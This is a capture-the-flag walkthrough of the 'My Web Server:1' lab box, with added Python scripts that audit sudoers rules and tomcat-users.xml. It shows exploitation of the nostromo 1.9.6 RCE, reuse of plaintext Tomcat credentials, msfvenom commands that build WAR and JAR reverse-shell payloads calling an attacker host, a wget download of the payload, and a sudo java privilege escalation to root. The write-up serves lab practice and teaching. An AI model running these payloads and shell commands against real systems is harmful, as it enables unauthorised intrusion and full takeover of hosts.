My Web Server:1 walkthrough

Introduction

I did this one.

Reconnaissance and attack

nmap hell
$ nmap -sV -Pn -A 192.168.111.9
Starting Nmap 7.60 ( https://nmap.org ) at 2020-04-15 10:35 JST
Nmap scan report for 192.168.111.9
Host is up (0.0013s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 cd:dc:8f:24:51:73:54:bc:87:62:a2:e6:ed:f1:c1:b4 (RSA)
|   256 a9:39:a9:bf:b2:f7:01:22:65:07:be:15:48:e8:ef:11 (ECDSA)
|_  256 77:f5:a9:ff:a6:44:7c:9c:34:41:f1:ec:73:5e:57:bd (EdDSA)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.3.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Armour – Just another WordPress site
2222/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: Radius by TEMPLATED
3306/tcp open  mysql   MySQL (unauthorized)
8081/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Visualize by TEMPLATED
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.83 seconds
Searching with searchsploit shows that nostromo 1.9.6 has an unauthenticated RCE vulnerability (CVE-2019-16278, a directory traversal in nhttpd that lets a crafted request execute /bin/sh), so I used it to get a reverse shell.
Inside /etc/sudoers.d there were a README and a file named mysudo:

$ cat mysudo
tomcat ALL=(ALL) NOPASSWD:/usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java
So the tomcat user can run the JDK's java binary as root without a password. Since `java -jar` executes whatever bytecode the caller hands it, a shell as tomcat is as good as root.
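Since the whole privilege escalation hinges on that one sudoers line, here is an added example, not part of the original post, of a small Python audit that parses sudoers-style rules and flags the ones a reader of GTFOBins would: any rule whose command is ALL, or whose binary can run arbitrary code (java via -jar or -cp, python, perl, vim, and so on), with NOPASSWD noted separately. The sample rules are constructed; only the tomcat line is the one from the box, the other lines are made up for contrast, and the binary list is a hand-picked subset rather than an exhaustive one.

```python
import re
from pathlib import PurePosixPath

# Constructed sample. The 'tomcat' line is the rule found in /etc/sudoers.d/mysudo
# on the box; the other lines are invented to show rules that are and are not flagged.
SAMPLE_SUDOERS = """\
# /etc/sudoers.d/mysudo (constructed sample)
Defaults env_reset
tomcat ALL=(ALL) NOPASSWD:/usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java
deploy ALL=(root) NOPASSWD: /usr/sbin/apache2ctl graceful
ops    ALL=(ALL) ALL
"""

# Binaries that spawn a shell or execute caller-supplied code when run via sudo.
# Hand-picked subset of the GTFOBins "sudo" category; java is here because
# `java -jar x.jar` / `java -cp . X` simply runs whatever bytecode you give it.
SHELL_CAPABLE = {
    "java", "python", "python2", "python3", "perl", "ruby", "node", "php",
    "bash", "sh", "dash", "zsh", "vim", "vi", "nano", "less", "more", "find",
    "awk", "env", "tar", "zip", "gdb", "docker",
}

# user host = (runas) TAG: cmd1, cmd2   (runas and tags optional)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"
    r"(?P<cmds>.+?)\s*$"
)


def parse_rule(line):
    """Parse one user-specification line; return None for blanks, comments, Defaults and aliases."""
    line = line.strip()
    if not line or line.startswith("#") or line.startswith("Defaults"):
        return None
    if "_Alias" in line.split()[0]:
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    tags = {t.strip(": ") for t in m.group("tags").split(":") if t.strip(": ")}
    # No (runas) spec means sudo's runas_default, which is root.
    runas = (m.group("runas") or "root").split(":")[0].strip()
    return {
        "user": m.group("user"),
        "runas": runas,
        "nopasswd": "NOPASSWD" in tags,
        "commands": [c.strip() for c in m.group("cmds").split(",") if c.strip()],
    }


def audit_sudoers(text):
    """Return one finding per command that gives the user arbitrary code execution."""
    findings = []
    for line in text.splitlines():
        rule = parse_rule(line)
        if not rule:
            continue
        root_reachable = rule["runas"] in ("ALL", "root")
        for cmd in rule["commands"]:
            binary = PurePosixPath(cmd.split()[0]).name
            if cmd == "ALL":
                reason = "unrestricted command list"
            elif binary in SHELL_CAPABLE:
                reason = f"{binary} runs attacker-supplied code"
            else:
                continue  # e.g. apache2ctl graceful: restricted, not flagged by this check
            findings.append({
                "user": rule["user"], "runas": rule["runas"], "nopasswd": rule["nopasswd"],
                "command": cmd, "binary": binary, "reason": reason,
                "severity": "root" if root_reachable else "lateral",
            })
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        tag = "NOPASSWD " if f["nopasswd"] else ""
        print(f"[{f['severity']}] {f['user']} -> ({f['runas']}) {tag}{f['command']}: {f['reason']}")
```

On a live box the equivalent check from the user's own shell is `sudo -l`; the script is for reviewing sudoers.d files pulled off a host, where the first finding it prints is exactly the mysudo rule.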
Next, enumerate the tomcat installation:

$ find / -name tomcat 2>/dev/null
/opt/tomcat
/usr/local/tomcat
$ cat tomcat-users.xml
<?xml version='1.0' encoding='utf-8'?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="@sprot0230sp" roles="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="admin" password="as3epr04irto" roles="admin-gui"/>
<!--
  NOTE:  By default, no user is included in the "manager-gui" role required
  to operate the "/manager/html" web application.  If you wish to use this app,
  you must define such a user - the username and password are arbitrary. It is
  strongly recommended that you do NOT use one of the users in the commented out
  section below since they are intended for use with the examples web
  application.
-->
<!--
  NOTE:  The sample user and role entries below are intended for use with the
  examples web application. They are wrapped in a comment and thus are ignored
  when reading this file. If you wish to configure these users for use with the
  examples web application, do not forget to remove the <!.. ..> that surrounds
  them. You will also need to set the passwords to something appropriate.
-->
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
-->
</tomcat-users>
So the tomcat user's password is @sprot0230sp (and admin's is as3epr04irto), both stored in plaintext, so I log in to Tomcat with it.

The tomcat user holds the manager-gui role, which unlocks the /manager/html web interface (scripted deploys through /manager/text would need manager-script). From that interface a WAR file can be deployed, so I use that to get a shell.
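Because the credentials above sit in tomcat-users.xml in plaintext, here is an added example (mine, not the author's) of auditing that file with Python. It parses the XML properly, so the commented-out sample users are not reported (a grep for `password=` would catch them), strips the http://tomcat.apache.org/xml default namespace that makes naive `root.findall("user")` lookups return nothing, flags users holding manager-* or admin-* roles, and applies a heuristic for plaintext passwords based on the shape of Tomcat's digested credentials (hex, or `salt$iterations$hex` when salted). The sample XML is constructed from the file shown above.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample mirroring the tomcat-users.xml recovered from the box. The
# commented-out users are included to show that the XML parser skips them.
SAMPLE_TOMCAT_USERS = """<?xml version='1.0' encoding='utf-8'?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="@sprot0230sp" roles="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="admin" password="as3epr04irto" roles="admin-gui"/>
  <!--
  <role rolename="tomcat"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  -->
</tomcat-users>
"""

# Roles that unlock the manager and host-manager apps: manager-gui = /manager/html,
# manager-script = /manager/text (scriptable deploy), admin-* = /host-manager.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status",
                    "admin-gui", "admin-script"}

# Unsalted digests are plain hex (MD5 is 32 chars, SHA-256 is 64); a salted
# MessageDigestCredentialHandler entry looks like "<salt-hex>$<iterations>$<digest-hex>".
HEX_DIGEST_RE = re.compile(r"^[0-9a-fA-F]{32,}$")
SALTED_DIGEST_RE = re.compile(r"^[0-9a-fA-F]+\$\d+\$[0-9a-fA-F]+$")


def local_name(tag):
    """Drop the '{namespace}' prefix so the code works with or without a default namespace."""
    return tag.rsplit("}", 1)[-1]


def parse_users(xml_text):
    """Return every <user> element as a dict; comments are dropped by the parser."""
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    users = []
    for el in root.iter():
        if local_name(el.tag) != "user":
            continue
        roles = [r.strip() for r in el.get("roles", "").split(",") if r.strip()]
        users.append({"username": el.get("username"),
                      "password": el.get("password", ""),
                      "roles": roles})
    return users


def looks_plaintext(password):
    """Heuristic: anything that is not shaped like a Tomcat digest is treated as plaintext."""
    return not (HEX_DIGEST_RE.match(password) or SALTED_DIGEST_RE.match(password))


def audit_tomcat_users(xml_text):
    """List users who can reach the manager/host-manager apps, noting plaintext passwords."""
    findings = []
    for u in parse_users(xml_text):
        privileged = sorted(set(u["roles"]) & PRIVILEGED_ROLES)
        if not privileged:
            continue
        findings.append({
            "username": u["username"],
            "privileged_roles": privileged,
            "plaintext_password": looks_plaintext(u["password"]),
            "can_script_deploy": "manager-script" in privileged,
        })
    return findings


if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        pw = "PLAINTEXT" if f["plaintext_password"] else "digested"
        print(f"{f['username']}: roles={f['privileged_roles']} password={pw} "
              f"text-api={'yes' if f['can_script_deploy'] else 'no'}")
```

Run against the box's file it reports tomcat (manager-gui) and admin (admin-gui), both with plaintext passwords and neither able to use the /manager/text API, which is why the WAR goes in through the HTML form rather than a one-line curl.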
Following the article below, create a WAR file with msfvenom (www.hackingarticles.in):

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.111.28 LPORT=8001 -f war > ./java.war
Payload size: 1103 bytes
Final size of war file: 1103 bytes
Deploy java.war through the manager and, with the listener already running, request http://192.168.111.9:8080/java/ to trigger the reverse shell. (Port 8080 was not among the ports in the initial scan output above, so do not rely on a single default scan to find Tomcat.) The shell comes back as the tomcat user, which is exactly the account named in mysudo:

$ ncat -lvp 8001
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 8A35 CC8A A242 2509 93CB 0F8B 4D08 D92E 2837 C1B8
Ncat: Listening on :::8001
Ncat: Listening on 0.0.0.0:8001
Ncat: Connection from 192.168.111.9.
Ncat: Connection from 192.168.111.9:49108.
python -c "import pty;pty.spawn('/bin/bash');"
tomcat@webserver:~$
As mysudo showed, java can be run as root, so build a JAR payload the same way as the WAR, then have the target download it with wget (or similar) and run it. On the attacker side:

$ msfvenom -p java/shell_reverse_tcp LHOST=192.168.111.28 LPORT=8002 -f jar -o shell.jar
$ python2 -m SimpleHTTPServer 8080

On the target:

tomcat@webserver:~$ wget http://192.168.111.28:8080/shell.jar
--2020-04-15 20:33:45--  http://192.168.111.28:8080/shell.jar
Connecting to 192.168.111.28:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7552 (7.4K) [application/java-archive]
Saving to: ‘shell.jar’

shell.jar           100%[===================>]   7.38K  --.-KB/s    in 0.02s

2020-04-15 20:33:45 (418 KB/s) - ‘shell.jar’ saved [7552/7552]

tomcat@webserver:~$ sudo -u root java -jar shell.jar
sudo: unable to resolve host webserver: Name or service not known

The "unable to resolve host" line is only sudo failing to look up the machine's own hostname; the command still runs. Note that sudo matches the command you type, resolved through PATH, against the path written in the rule, so if `java` on the tomcat user's PATH is not the AdoptOpenJDK binary named in mysudo, invoke it by its full path instead.
Listener side:

$ ncat -lvp 8002
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: EDB6 FA48 3B73 E837 AAA6 E009 EC1F 80D6 CB34 32DB
Ncat: Listening on :::8002
Ncat: Listening on 0.0.0.0:8002
Ncat: Connection from 192.168.111.9.
Ncat: Connection from 192.168.111.9:34584.
python3 -c "import pty; pty.spawn('/bin/bash');"
root@webserver:/opt/tomcat#
root@webserver:/opt/tomcat# cd /root
root@webserver:~# ls
proof.txt
root@webserver:~# cat proof.txt
Best of Luck
$2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eep2ff0LbLYZrFq
Closing thoughts

This was my first box rated Difficulty: Medium/Intermediate Level, but I had done a similar one before, so it did not take that long. Next I will work through OSCP-like boxes.